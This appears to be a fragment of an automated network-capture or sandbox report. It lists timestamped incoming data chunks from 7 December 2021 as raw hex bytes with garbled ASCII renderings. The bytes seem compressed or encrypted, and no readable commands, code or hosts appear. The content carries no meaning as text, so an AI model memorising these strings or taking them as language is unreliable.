                                                                                              Data Ascii: apy_ ^u/(9%5(c3N8Tc8FR'cd49Y ggjo3kAW{@U8~^w>E)(_79xpme oew4/;.>h/G#a4={G]"h^3xj8
                                                                                              2021-12-07 12:39:07 UTC383INData Raw: 98 3a 43 e0 dd 68 fe d8 b5 3f 8b fe 15 de f0 91 89 b5 75 f0 ff b8 9a 1e 91 0e fd 0f f2 7f 9c ad 38 8a f8 ff 61 58 fe bf c1 b8 49 f8 92 d7 50 73 7a 11 c1 2f 75 23 e0 7f 13 c2 fa 09 b6 38 ad 68 1b 15 9a 81 ff 92 1b 55 c7 5b 00 f7 df d6 e0 a7 70 f8 39 9b ca ab 09 3d 1a 89 26 cf a7 25 ac 36 e9 65 7e ed f4 62 f8 2f 4e c8 ff 37 23 ed bd db a9 54 b9 bc d7 53 0f 39 bf d2 b9 b6 02 ff d9 1d f8 cf 4b ab ce 34 01 f7 aa 23 bf b6 01 3e 51 6c ec 8f 37 e0 33 79 d6 b6 a6 fb 31 9d 98 0c 03 c9 11 23 a8 7f 7f 29 50 86 fb f1 e7 fe 14 6f 37 1b 05 fd d3 2d 1a 57 c3 6b 27 20 ff 8d 26 d6 95 b5 ac 2a 7f 02 ea ff ae 10 0b ce ce c8 f3 fb 29 1b 9f e3 3e c5 16 db 3f ab 4e 93 3f 4a 92 d4 1f 24 51 f2 fb a4 71 06 c2 7f 92 da b0 f8 cf 31 b8 ff 8d 2b b7 e9 36 4e 9a ad d1 78 76 33 3f a0 ef
                                                                                              Data Ascii: ]xm!`~z;mPit$N?9xA9N;Ax<PXP7DIsi]|%*-N}D50r8a$&k&9Fd.u-8~EagMdQc3V#(MKF}{4P<pzMm@rJHg&)p@PCfKR
                                                                                              2021-12-07 12:39:07 UTC656INData Raw: ee c4 15 be 85 41 d1 25 ee 1c 7c fb 36 94 ad 9e fb 09 9b ea 2a b1 50 fa 85 d1 92 b0 11 fd 5a ea ac 8c a3 a1 1e 77 dd cf 6a 98 44 e9 c0 44 e4 a2 2b ff fd ed 70 b2 41 17 e6 a2 aa 45 9f 4e 52 08 61 53 c2 66 01 cc b4 ae 3c d2 72 58 72 67 bc 16 d3 58 fe a6 87 39 51 c7 78 72 83 ae 7c ee 81 f6 c2 5d 8a 34 7d 85 56 34 3e ac 98 9a 23 a6 14 ad 5d f8 26 f3 fb 28 1b 49 32 81 71 76 e2 fc be 2e 37 d8 b9 4b e0 8c 1b d1 18 3d 00 ad 19 25 bf d1 b7 de cb 8b da 68 dc 6a bb 8d 15 e3 c9 50 8f 7a 55 ff 3d 1f 9e 0b 6e b1 4e 64 e7 72 ca 0e 74 51 8b ff 8c f4 bf 7b 3b 23 59 21 7c 37 f6 9d b3 38 27 5c e7 e0 6c 58 9c 0c 2e 86 ff 21 d7 a0 d1 11 02 7c a3 81 91 d8 df 5a 56 df d8 c6 f0 ec d1 57 30 51 96 fe 35 fe 3b 59 ac 49 61 c9 9c b1 16 aa 74 3d d1 8d f7 1e 1c 9b 25 63 5a e5 f7 f2 71
                                                                                              Data Ascii: A%|6*PZwjDD+pAENRaSf<rXrgX9Qxr|]4}V4>#]&(I2qv.7K=%hjPzU=nNdrtQ{;#Y!|78'\lX.!|ZVW0Q5;YIat=%cZq
                                                                                              2021-12-07 12:39:07 UTC664INData Raw: 81 45 d3 6e 56 78 d0 ae 4c 42 9d 2a 90 78 b6 dc 31 ac f7 79 d8 d9 b3 e2 2c 5b 90 5c dc b4 75 9e d5 ee e0 c2 da 2b ad 78 84 da 7d 35 2f 77 e9 a7 20 a2 e8 02 4c 7d 73 44 74 f8 a0 4e 45 ad b7 cb f4 20 3d 14 67 9e 63 6d d8 69 4e eb 96 19 c1 5b e9 9b 9f 08 97 96 79 d4 e0 62 fd d5 2c a5 a7 3d b7 d9 61 00 c8 64 3f 80 b6 50 63 e9 33 81 64 07 4b c4 30 29 5b d5 dc c4 17 20 31 f2 63 e5 10 11 12 ae ea 52 23 89 63 67 b9 27 d4 eb 15 9d 41 1c 25 1c b7 37 b4 93 ba a1 de 03 02 f5 38 bf 71 92 0c 54 9e e4 9c 16 64 1f b5 09 42 1f f5 0b 69 e5 21 2d 66 7c e9 69 13 30 9d f4 31 7f c4 cd b3 40 52 df cf 6c ea 78 ac dd 24 2f a7 1b 25 0f 25 8c 18 1d 7b 76 c0 87 94 9a 1f 2a 28 1f dc be 47 4b c2 bb ee c9 07 31 6c 54 90 23 88 bb df 67 0d f9 a6 9c 1e a8 ce 76 51 6c 9f af b3 60 62 7b 13
                                                                                              Data Ascii: EnVxLB*x1y,[\u+x}5/w L}sDtNE =gcmiN[yb,=ad?Pc3dK0)[ 1cR#cg'A%78qTdBi!-f|i01@Rlx$/%%{v*(GK1lT#gvQl`b{
                                                                                              2021-12-07 12:39:07 UTC672INData Raw: cf c3 44 e6 16 1a 3a dd 4f 69 a3 ed b9 45 c8 d9 34 d4 ac c7 43 50 23 2d 57 53 4d f8 79 a1 53 3e 56 c6 c1 48 d3 59 ba be be b9 80 8d 0d 88 7a 5f 7b b7 3c 2c 51 ce 3e 8c da 4c 39 33 ac 55 da a9 42 18 6b 34 d1 bd 8d 5e 0d 56 2e ee c1 5d 10 2b 9d 7d 9a 2d 0f f8 d5 fb be 43 9e 30 b5 de 88 f6 94 38 8a f4 d9 ce 98 b3 49 3f 0a 04 5f c2 ff 12 ca 4e 44 97 72 ff 92 61 46 36 52 0f 18 90 85 dd 57 43 72 a2 00 af bf 33 88 5a 96 4f 5b bb 00 d1 12 98 7e 90 e3 5d 23 1a f7 e1 81 88 b9 7a b0 4e b1 f2 09 e4 97 ac d8 34 ea 9e 5d 0f e5 84 ed 8c 39 d3 16 d0 ea a6 e6 27 79 84 45 e6 4b 8f 0c fe 06 0b f7 33 52 75 06 9f f1 c1 90 64 9c b2 af e8 6c 95 75 ec 6e 9a 65 a1 df 20 5d dc 3f 4c b5 cf c3 37 c3 00 57 22 48 3e cb 12 e6 34 94 f5 35 69 21 96 36 d6 fb 1b 47 02 13 fa ef 44 20 ec 21
                                                                                              Data Ascii: D:OiE4CP#-WSMyS>VHYz_{<,Q>L93UBk4^V.]+}-C08I?_NDraF6RWCr3ZO[~]#zN4]9'yEK3Rudlune ]?L7W"H>45i!6GD !
                                                                                              2021-12-07 12:39:07 UTC680INData Raw: 2d 20 31 c8 83 af 07 31 47 66 d4 47 3f 83 b5 db ff d4 f2 32 b7 2e 80 7c 67 7e 71 00 b5 d7 04 57 d7 b8 23 e1 7e 0e ac 0c ed 48 9f d4 54 76 2c 98 d9 10 99 35 a8 46 e0 bb a5 5c 29 6b ff 5f 55 7c 4c 40 60 6e 2c a1 08 5d 71 16 4b 38 fd bb 94 57 98 7d 75 c3 37 5a 51 9f f8 dc e7 4e da 0a 98 1f a3 46 f0 b3 39 60 38 04 6d e5 66 8b a2 d0 ae 24 d9 2e 74 14 3a 13 d8 13 90 2a c9 de 67 df f2 a1 a6 7f 76 e7 60 f8 04 74 00 93 e0 7f 50 ec f8 81 15 45 5c f0 84 9a 4b 9a 3a 94 28 60 77 af 9c 9b d0 97 45 d4 04 2c 9b bc ad 40 35 8e 63 e5 c6 3f dc fe 39 28 5d 43 ce cb c5 71 3d d8 73 19 01 61 f1 9c 35 7d 5d 11 b7 e3 37 41 84 11 cb cc f4 b8 59 c5 4d 69 66 99 31 cc 71 dd de 26 22 97 1b ae 01 ba 1a 18 d7 63 19 99 1f 69 31 11 66 b7 4b dc 21 6e 5a 05 0d e0 f0 84 69 18 9f 15 13 dd 69
                                                                                              Data Ascii: - 11GfG?2.|g~qW#~HTv,5F\)k_U|L@`n,]qK8W}u7ZQNF9`8mf$.t:*gv`tPE\K:(`wE,@5c?9(]Cq=sa5}]7AYMif1q&"ci1fK!nZii
                                                                                              2021-12-07 12:39:07 UTC687INData Raw: 87 6b f7 d2 5c 9f 71 2f 32 66 8d b5 8c 98 14 48 a2 f6 11 c5 00 eb fd a9 9f d2 ac 55 5f e6 68 11 e5 0d 89 25 fe cf 67 21 6f 77 68 13 b6 14 95 30 ad 46 70 9d 98 1b 39 7f de 3d be 26 85 7a af 39 d7 47 67 9b 9f 6f 5c e0 d2 a4 81 ca fe 06 dd f7 0e 11 64 5f 78 34 76 c9 7a a2 84 51 fe e8 02 47 6a 10 8e 59 93 74 eb f4 73 db d6 18 13 15 ca 50 05 59 47 8e ef 71 f8 7e 52 ef d4 95 38 51 98 54 a5 bd 06 73 c8 3b 24 7f e6 f7 00 72 63 02 c9 23 25 50 f8 74 c9 52 a1 72 7e 17 ec fd 42 03 67 f9 3e 6b 6c 63 87 21 ab 6d ee 96 e4 90 1e 6c d2 9e 16 e1 cf 11 ed 1d a7 ef 0e d1 70 75 d7 91 4b c8 ab 3e 17 ea 0f 37 60 0a 8c db f5 e1 19 73 a5 b1 24 ce 72 13 3f 3c 36 6e fa 90 5b b3 75 6d 26 9c 12 12 7d 0b 99 93 10 f2 14 7a bc d2 92 d6 20 b2 49 3c 6d e1 7b 80 f0 24 63 f3 61 ee bf e7 73
                                                                                              Data Ascii: k\q/2fHU_h%g!owh0Fp9=&z9Ggo\d_x4vzQGjYtsPYGq~R8QTs;$rc#%PtRr~Bg>klc!mlpuK>7`s$r?<6n[um&}z I<m{$cas
                                                                                              2021-12-07 12:39:07 UTC695INData Raw: 1f 4d 0c 12 a1 ff d6 d5 49 10 eb fc 9a ed 95 8e 34 1d aa 55 e4 cc 06 1a 95 96 a6 82 79 81 27 76 6d e7 00 36 ae 5f 56 da a2 ce 70 24 b8 cc 2f 2c 8b af 1f f1 f6 27 b5 fb 46 60 f4 9d 49 fc 36 92 87 f5 6a dd a4 6b 76 45 6f 1d 5f bf ab d0 45 2e 32 58 69 7b b5 2c b8 b9 f3 bf 82 ac a5 1d 24 bb 24 7b f3 3a 0a df f7 28 6a 2d 40 65 f8 bc a2 01 69 9d e8 30 1f af af d5 21 18 34 ac 3e 65 f8 19 53 4d 16 0b 32 ab 55 7c 7d a8 e2 52 be af 23 f3 52 95 a3 61 52 78 2d 16 b0 28 bb 5c b3 3f 91 75 82 07 e3 27 8e bc 1a 64 96 f4 35 27 8b 65 af 03 43 67 b5 c1 4c d3 c7 a8 07 da b7 6f 58 40 1d 19 a8 14 27 36 25 03 e6 86 5d a8 e7 1f 00 4b ef fe ed 5b aa 3f 6e 1b 4a a8 46 dc b7 48 14 3c d7 08 6d 2d dc da af 29 1d 5d 98 67 56 e8 2e c1 76 ad 88 89 50 32 d7 81 f8 5f 37 9a b7 ce 6b 72 64
                                                                                              Data Ascii: MI4Uy'vm6_Vp$/,'F`I6jkvEo_E.2Xi{,$${:(j-@ei0!4>eSM2U|}R#RaRx-(\?u'd5'eCgLoX@'6%]K[?nJFH<m-)]gV.vP2_7krd
                                                                                              2021-12-07 12:39:07 UTC703INData Raw: 40 96 64 36 47 f9 1e 13 36 2c dc dd d9 31 5e ec 6b b3 f0 58 09 b3 2b a5 23 be 16 63 43 99 ec cb ca 7e 07 b6 26 51 0a 28 2d 77 b1 d3 b5 a8 49 b2 47 0e a7 45 1b bb b2 90 2e 2c 7f ad 29 ed 01 e6 fa c0 51 9d 95 73 47 75 31 3d 15 f1 04 40 c8 e1 33 24 73 2d c3 ea 05 bf 91 8c 8e da 6e d7 03 09 94 9d ab 02 0a 3d 6b a6 d7 75 00 ad de c5 12 b4 14 dd e4 88 3f 3d d7 33 59 cb 82 a9 7c ab af d0 b7 01 41 f3 13 ed de a1 04 48 5a ef 1f 99 df 55 e7 f5 40 d0 a8 7a 15 2b af c3 86 ca 58 2d bf 9e 29 28 a9 04 05 70 69 1e d6 e0 5c 43 55 51 ab 4d d6 44 5d 25 23 c3 bf 8a 30 95 71 75 ae 43 13 7b a8 5c e5 c9 96 1b 5e 12 d3 99 25 a6 ee 07 d2 90 b8 27 d3 b6 cb e1 a0 3d 25 1a 6e a2 7a 37 d2 2e 09 cf 6e 8e 3d 5b 67 8d 0e 9d e3 99 90 73 a9 84 ce cf 29 af fd 6f 4e 92 83 38 a5 da 69 8e 12
                                                                                              Data Ascii: @d6G6,1^kX+#cC~&Q(-wIGE.,)QsGu1=@3$s-n=ku?=3Y|AHZU@z+X-)(pi\CUQMD]%#0quC{\^%'=%nz7.n=[gs)oN8i
                                                                                              2021-12-07 12:39:07 UTC711INData Raw: 6f 52 e0 e8 a7 49 3b 2b be 07 8a cf 9a cc 49 24 48 13 e7 6d b7 02 c7 91 1d a9 9a 91 6d 42 f4 a5 82 0c 14 9c 83 cc 67 10 d4 a5 e5 c6 fc 74 a8 9d c8 a1 29 6f 21 33 57 32 e9 8a 5f 21 03 89 88 cb 2c cb 74 a7 02 a0 e2 a6 ed 35 51 7b 0a c3 b5 39 d5 5a 1b 09 93 91 70 4a e5 d8 ed 52 ee 79 1c 33 d6 0c b8 76 c8 36 46 5a d3 dc ac a9 1b e4 52 00 8b 37 f1 4c a5 d7 74 a8 76 77 71 9a b6 cd ab 83 66 a8 c9 d6 e5 47 eb fd b5 68 a0 cf 76 02 67 81 91 7b 2c d4 92 af 7c b5 4a ef 8b 13 b0 59 cd e5 c0 c0 8a a8 f3 a5 99 da d0 73 b4 10 21 d9 8d ae 7f a6 9b 72 e2 a9 9e 6d 32 6a 24 cb df e5 37 aa 1a 72 12 c0 8c 07 65 d1 78 44 c2 e8 f0 25 50 d6 c6 35 4c b2 08 66 a8 8c bf 19 5c 47 f1 2d 69 6c 5c 25 6e f5 36 44 67 fd 50 07 a6 99 78 37 6e e5 80 1a 28 6d 33 ba 69 da 71 33 fb 5c ca 45 b6
                                                                                              Data Ascii: oRI;+I$HmmBgt)o!3W2_!,t5Q{9ZpJRy3v6FZR7LtvwqfGhvg{,|JYs!rm2j$7rexD%P5Lf\G-il\%n6DgPx7n(m3iq3\E
                                                                                              2021-12-07 12:39:07 UTC719INData Raw: 5f a6 00 ed b5 60 86 07 2c 43 3f 8e a7 c4 24 1c 9a df a6 82 fe 3e 7c f6 cf d1 0d ee 34 87 8a f1 d5 ff 79 47 59 4d f6 d3 fc 70 8c 3a f9 01 39 94 d7 c8 6b 91 b5 e8 12 bf 61 86 b4 a8 ce 43 82 69 9a 37 49 d0 2d 8d d4 55 4c da 81 6a d4 e6 6d 06 f8 50 82 68 ec 0c 72 4d 21 31 5e 59 9d 93 60 8c 39 47 7e 26 1f 3c 24 bc e6 46 18 d2 d8 e1 ac d9 ac ba 12 9f 49 1d 7a 23 b2 3e 7d a7 a2 a1 54 63 c3 e1 ac 41 2a 59 05 7a d8 55 2a 8e dd 4c cc c7 6c 43 64 83 e6 cb d6 17 a9 fc 00 de ce 3c 8d 74 3e f6 40 05 09 d0 f3 5d aa a6 2e 19 64 6d 0a e8 a1 50 2a 07 e6 de 06 61 89 0c 0d b6 d7 57 55 59 63 ba fe 2b 4b 6c 07 02 c1 67 26 42 76 65 e7 9c 57 07 7b 20 8d 85 80 f3 c7 ce bf 8a c0 4e 6d 1d 4b 1f 1c 15 80 9a 63 ef 68 b5 cb ef 33 31 6b 41 96 c3 70 7c f0 cf 49 c1 6c 56 ec 55 99 38 bb
                                                                                              Data Ascii: _`,C?$>|4yGYMp:9kaCi7I-ULjmPhrM!1^Y`9G~&<$FIz#>}TcA*YzU*LlCd<t>@].dmP*aWUYc+Klg&BveW{ NmKch31kAp|IlVU8
                                                                                              2021-12-07 12:39:07 UTC727INData Raw: 0f 2e 98 d3 6e a7 a6 92 09 a4 7a 5d 4b 13 94 a2 41 2b 3a 63 6f e0 72 cc 58 61 56 91 50 2c ed a7 86 d4 23 49 b3 12 77 a7 09 b4 61 07 3b bc 22 ca d0 9e 40 6c 51 a8 1d e6 9b b6 5e f5 de f0 fc 23 56 ae 91 a7 cd c5 b1 58 35 ed 59 b8 d0 70 9c 90 44 ce 5a b2 07 42 64 f4 dc e7 0e 3e b6 4e f9 b0 45 1e 31 2a bf af 66 98 3f c1 67 96 87 75 21 f0 13 93 0e 8f 17 bd 1e c9 94 ff 82 15 e3 b2 cf 52 4d 99 c4 ac 3b a1 a9 06 24 65 2f 48 8b a1 4a bf 1a 82 19 81 81 7b 92 0f 4a 53 59 c0 b2 1d 65 b6 c1 d4 34 b0 3a a7 d3 2a a7 d0 b5 fa ba 3a 9b 4c cc 2c 96 92 2f 7a f1 67 72 c8 2b d4 0d 09 4d dd bc d9 43 25 5f 41 82 c2 65 a9 a6 6b 38 af 66 91 05 c2 01 1d 72 a9 e1 d3 94 4e 16 f1 5f 50 86 5b 0c 22 82 e0 be 19 ad 0d 36 e4 d7 8d 2d 0e 18 bc 1b 79 36 8e 74 0c f4 17 e8 33 c4 f1 46 ce 32
                                                                                              Data Ascii: .nz]KA+:corXaVP,#Iwa;"@lQ^#VX5YpDZBd>NE1*f?gu!RM;$e/HJ{JSYe4:*:L,/zgr+MC%_Aek8frN_P["6-y6t3F2
                                                                                              2021-12-07 12:39:07 UTC734INData Raw: 0c a9 1b 8e f5 79 7e 9e a4 30 87 d2 4c 00 15 a6 0b fd 10 ac 89 55 e1 11 1a 04 a0 b7 9c 32 5d 24 4d 1b 28 23 2c e6 5a 1e b9 09 84 9b 83 29 d4 b8 91 80 49 ae d2 1c c5 3a 11 ac 15 69 50 2b ba f9 28 79 25 f5 c9 93 fb 71 5f cc 42 55 c5 7d 4c 0b ee 24 c2 06 71 91 25 68 3d 15 d1 ca 87 50 76 b8 3d a1 e9 96 d2 29 24 0e e0 fd 27 bb 51 24 14 c2 6e 72 f8 65 36 f5 8c 07 f0 a9 23 2d 6c 5e b5 5d 28 da f6 68 2e e3 22 cd 90 79 e5 c5 b4 7e 4c 3b a1 eb 5a 80 8c e8 f3 b8 57 87 77 74 59 a2 df ca 97 fe 17 38 f5 7e fc f8 bb 04 d1 56 37 a1 e7 9f 37 c1 c4 73 f9 dd 31 8c 95 66 ae 88 e6 45 1c e2 1b 86 88 74 38 e4 0f bd f1 c6 1e 50 01 40 77 27 f0 cc 48 71 cf 40 2f 8f ef 44 9e d2 b1 ad 02 26 1d 82 ed 43 7a aa 08 d5 75 f0 60 1a bd b0 6b 95 c9 fc 0f 7f b1 f0 cf 15 9f 7f 08 db ac 35 32
                                                                                              Data Ascii: y~0LU2]$M(#,Z)I:iP+(y%q_BU}L$q%h=Pv=)$'Q$nre6#-l^](h."y~L;ZWwtY8~V77s1fEt8P@w'Hq@/D&Czu`k52
                                                                                              2021-12-07 12:39:07 UTC742INData Raw: 4e a3 92 8f 13 04 e8 b2 c7 89 86 7a a4 33 e8 74 af c0 63 10 a0 e6 e3 48 55 40 81 2d 08 0a d4 2c 14 ce f6 d8 e8 ba 0a 31 a8 87 bb 69 cb 37 c3 67 51 38 e9 8e 85 14 99 03 5d b0 1d 53 57 7c 9e 30 d6 f9 13 41 2f 44 d9 d8 03 53 73 cf 52 86 5f 47 b5 ff e2 b1 b9 5f 6a db f2 18 7e 11 81 f3 b9 cf 18 30 66 ab cd 74 b5 b1 6b 77 03 7d 10 1a b7 0f e4 4b 6b 64 ab eb 0e 5e 8d 9f bd 81 9f 50 fc c8 7a e4 74 27 8b 75 1e 1f 4d e6 9e ab 09 40 e9 0e 17 ad a3 f4 eb 01 4a f6 e2 d9 6b 53 c3 ba 69 a7 f9 74 c5 fe a4 39 ff 95 d0 97 bb 11 e7 86 f1 19 38 10 e2 93 3b 32 47 fd 9e a9 f5 70 f8 4f e9 9e b6 f9 a4 ef 90 8e c4 0c 30 75 2d d4 26 52 68 f5 b5 28 47 25 59 35 ce e8 87 8f 86 a7 67 96 09 f2 cd 09 bd a8 90 c5 d9 d0 f0 22 81 ea df d1 c9 99 bc b6 3c f5 47 3f c8 45 98 86 b6 42 6f 44 83
                                                                                              Data Ascii: Nz3tcHU@-,1i7gQ8]SW|0A/DSsR_G_j~0ftkw}Kkd^Pzt'uM@JkSit98;2GpO0u-&Rh(G%Y5g"<G?EBoD
                                                                                              2021-12-07 12:39:07 UTC750INData Raw: 1e 20 81 5b 2e d7 86 2b 25 c2 c9 5a 65 41 7c 94 64 83 11 4a b8 b3 b0 c5 3d 77 48 f8 aa 12 d2 82 6d 74 88 a0 42 4b cf 02 ab db 61 79 66 29 29 d0 5c f6 ae 82 f1 c0 51 cd 2e 82 e6 42 39 1e fb c8 0f 48 17 ea a8 72 15 6b 76 63 02 12 d1 a2 77 bf c0 73 ea f9 97 45 7e bc 61 be 66 ea 85 be 9a 50 0d bf ec fd 04 9b 9c 9d 99 0b d6 d4 1e 2d c0 48 47 05 d9 e5 7c d1 0f 88 f8 74 ce b5 21 f0 0f a5 b3 f9 ca 0d d0 6e 89 03 05 92 77 c9 ae 68 66 78 0c e9 7d 00 37 8f 4d 48 de 09 3d c6 6c b3 58 b8 0e 2c ff 1a 12 d4 a4 65 ec 7b c6 5a 1e b0 e0 4e 45 ad d2 e6 3b eb 7a d3 d4 06 9d e9 d3 9b ae 1c 62 b2 05 4f 6c 21 70 59 90 8b 58 01 07 41 6f 72 2b b1 e6 1b 55 e8 f8 d0 5c 2b 06 ef 69 9f fe 10 71 4b 31 4f 66 a7 f7 85 ae ea f1 43 7e ba e7 fd d6 b2 84 c8 5c fd 5f f1 23 c4 9a 2d d3 fb 9a
                                                                                              Data Ascii: [.+%ZeA|dJ=wHmtBKayf))\Q.B9HrkvcwsE~afP-HG|t!nwhfx}7MH=lX,e{ZNE;zbOl!pYXAor+U\+iqK1OfC~\_#-
                                                                                              2021-12-07 12:39:07 UTC758INData Raw: 77 52 88 6b ab 03 9b 60 4c 88 08 26 20 bd 37 fb 5a 40 3f 1a 65 ef e7 21 dd 44 6c b4 e5 0e 35 2d f6 2b c7 08 0f 99 28 fd dc 1d 89 48 a7 48 1f 00 0a f8 d7 14 dd 9b a5 9f 6b c5 01 2c 70 5b be ce 0a db 7d 02 08 fb 56 6c c5 16 70 27 6b 12 aa 18 30 24 30 8f 0d 86 3a 65 69 a5 94 e7 fd 3a 27 08 d4 69 de 60 6e e4 50 12 fa 84 18 07 ee d8 fe a2 76 42 3c d9 59 b7 3a d3 f6 f6 65 be 48 64 84 af bf cb fd 2b 31 77 2f 55 b8 40 b0 4b 4a a4 52 2e 90 0b 04 3f 97 d8 23 07 0d b5 d5 46 40 aa ff 5d 8e 2c 81 cb eb 5b d7 38 ff 59 9b c5 7f 0b d8 bf 9a 00 c1 de 86 a5 1c df 1f 30 97 0c d2 09 ba 74 78 ea 84 ed 25 31 20 b6 8a b1 66 e2 ce e9 9b b7 e0 06 fc 90 ca 70 ea f8 4f 47 15 c5 de 3c 24 db 06 36 da 9e 67 b5 4b de 7f bd ae 3d 8f ff e3 9e 07 97 3e 34 2a 56 5a ab 25 c6 3b 02 83 d5 4f
                                                                                              Data Ascii: wRk`L& 7Z@?e!Dl5-+(HHk,p[}Vlp'k0$0:ei:'i`nPvB<Y:eHd+1w/U@KJR.?#F@],[8Y0tx%1 fpOG<$6gK=>4*VZ%;O
                                                                                              2021-12-07 12:39:07 UTC766INData Raw: ea 68 78 9a 9e 2d 7f 2d 1b 59 87 c7 55 01 cc bb 54 fc 77 67 86 5d b4 cb f4 8a e1 21 73 51 1c 6c 7d ec 21 48 44 ee b3 20 fd d7 cc ad 14 56 16 af db cd 66 c2 4e 74 d4 5d c1 46 d3 a3 ad 56 e1 38 93 72 6a 7d 89 df 37 1d b2 90 c0 5e 11 46 fb 4a 98 f3 fb 48 b9 24 ad 62 b3 02 66 6a 4a b7 75 35 3d 40 49 fc 34 36 12 e7 b1 06 63 ed e5 c8 f2 8e 8c 4a 65 2e 09 41 74 71 53 11 1c d8 ac ed 6e 1a 04 8a 5a 2f f3 75 0b 34 74 a6 d7 8b 6b bc 07 54 4f 63 f8 fc 5b 93 c7 e1 4d ad d4 b6 4f d1 03 be 8a f8 6b 29 a4 0f 1b a9 dd 7f 12 1f 22 01 ea 13 89 7f a8 42 e7 22 57 47 b9 23 c4 73 a7 06 cb 81 88 f1 fc f8 5c c4 f1 98 d8 6b 63 4a b4 46 d7 3a 88 19 e4 5b 1f 95 83 d3 66 f1 ed 20 5b 11 f8 58 0f 37 04 b2 f5 62 69 a4 13 ef 0d c4 ee ab 9d a2 85 2c 79 f6 42 b6 84 ac e0 49 9c 55 ee 38 7f
                                                                                              Data Ascii: hx--YUTwg]!sQl}!HD VfNt]FV8rj}7^FJH$bfjJu5=@I46cJe.AtqSnZ/u4tkTOc[MOk)"B"WG#s\kcJF:[f [X7bi,yBIU8
                                                                                              2021-12-07 12:39:07 UTC773INData Raw: 1e 5f e7 e9 a5 b1 bd 37 20 f9 d4 d9 4c 03 d6 36 27 19 5a 0d 14 4f fb f9 7a ec 99 21 f3 b0 b2 c6 1d c2 c9 c6 8b 3b b9 f2 53 34 e8 30 cf 05 7f de b9 7c 3a 77 6e 37 60 41 a4 5a 61 f6 49 78 d8 4b 1b a7 83 29 d2 76 c9 ba f7 c4 85 5d dd 29 8c 5e 1d 96 72 2b d0 ce ca 5f 2a 48 7b 6c af c6 b2 d9 c5 a7 9a fc 85 cb bb 38 8e de 2b 71 bf 90 93 20 46 0f 03 b6 24 f0 de 33 b3 53 0c f5 e0 91 f6 37 db 9c d1 4c e1 90 60 75 6b 25 ad b7 88 d9 9e be 00 41 70 a8 5f 67 df ed 09 9f 52 e9 50 7e ea 94 29 03 69 f5 9e 69 86 28 ef be d1 4e d0 af 92 88 11 d7 20 31 36 54 a4 ec 3c 5d c7 e6 53 2b c6 50 0e bc b7 31 b4 f0 c4 e2 33 58 cc 2b 59 3c 98 8d 83 8c 3b ef 8a 26 e9 dc 38 3d 60 65 06 d8 bf 66 5d 54 2f a3 91 72 d7 1c b4 63 60 36 c4 97 8c 94 6a 45 8c 57 c9 7c 5f 4c 74 cf 03 bd 0f 67 97
                                                                                              Data Ascii: _7 L6'ZOz!;S40|:wn7`AZaIxK)v])^r+_*H{l8+q F$3S7L`uk%Ap_gRP~)ii(N 16T<]S+P13X+Y<;&8=`ef]T/rc`6jEW|_Ltg
                                                                                              2021-12-07 12:39:07 UTC781INData Raw: 60 ce 71 33 ae cc 56 28 0c df 3c c6 f9 fb a6 df f2 5b d7 6d c5 53 65 2a 0d 12 a0 53 a5 d4 5d 29 ba f7 df 91 91 75 76 8c 71 56 bb 41 f7 fa 2e 85 ad 38 24 db c3 97 5b c3 c6 d4 13 c8 3a 55 58 bd a4 90 50 9b c8 d2 7f 39 ff c7 87 c5 9d 16 a8 a9 2c 03 9c 82 b8 04 62 38 60 17 b7 c5 3d 7e 7e ff ec 60 a9 f8 8f 7d 42 57 19 aa f0 eb ea 1a 93 fb ab d0 27 2e 55 20 c2 8a 74 05 de 1f 6f 69 e8 83 df b9 19 59 d6 60 8c cf 23 5c f8 40 0e c3 df 5c df 35 be d1 df 75 3e ce 43 1c f4 e2 e2 85 48 96 6b 29 61 02 e2 95 b5 b5 cd b1 a3 d7 8f 1d 24 bf 8f e1 9c 19 60 c7 89 30 68 d5 4c a6 86 3c 0f 98 48 39 bd fb 82 61 99 a6 8f 53 10 d8 f9 92 78 c0 12 01 61 af 17 78 c6 e6 f2 9c 2d 6d 3a dd e0 d7 65 4f 3e 93 ae ef 39 bf 30 55 14 6b f4 9e 95 97 e2 25 b1 8c c4 b5 89 9a a4 d3 c5 31 66 5d de
                                                                                              Data Ascii: `q3V(<[mSe*S])uvqVA.8$[:UXP9,b8`=~~`}BW'.U toiY`#\@\5u>CHk)a$`0hL<H9aSxax-m:eO>90Uk%1f]
                                                                                              2021-12-07 12:39:07 UTC789INData Raw: 40 ea d9 07 a8 97 d9 2e 16 63 53 92 82 c9 96 49 87 b2 9b 90 32 3c e9 db 73 af 06 55 f6 12 9c a8 a7 6c 92 f7 75 e0 fb d5 4a 75 14 0e 4d 11 e0 ac d2 36 39 b6 37 55 53 9b e3 d5 1b bb dc c6 46 ce 83 05 2c 34 71 5d 73 2f a5 6e 0e ba c1 e6 fe 99 fa d1 45 d3 16 26 2f d2 0a fc e7 04 4e e8 92 8f 96 b0 6d 9b ce 37 72 2b 64 4b af d9 08 4a 76 2f 94 91 99 99 8b e6 fb b0 3a 48 48 70 5a 5f 55 b6 69 47 78 97 85 41 b2 6a 6b 58 26 96 43 d2 80 5c bb cf b1 24 49 a2 9e 87 71 87 8a 46 f1 00 31 60 35 db e1 87 29 d9 20 7a 77 fd 3c 2c f4 1f ed bd a9 28 c3 54 c6 8f c5 08 57 92 ac f1 96 38 77 55 f3 38 56 6b 5f 28 f7 88 bb 41 51 ec 0c 0a c7 46 49 75 f9 63 91 1a 44 63 2a 0a 8b ad 76 14 dc 6d cd 8b 41 16 4b 38 d3 3a 68 03 4c 6d 6e 9c 2d b1 0a 88 46 34 d2 c1 c0 4d 43 18 b0 80 47 21 22
                                                                                              Data Ascii: @.cSI2<sUluJuM697USF,4q]s/nE&/Nm7r+dKJv/:HHpZ_UiGxAjkX&C\$IqF1`5) zw<,(TW8wU8Vk_(AQFIucDc*vmAK8:hLmn-F4MCG!"
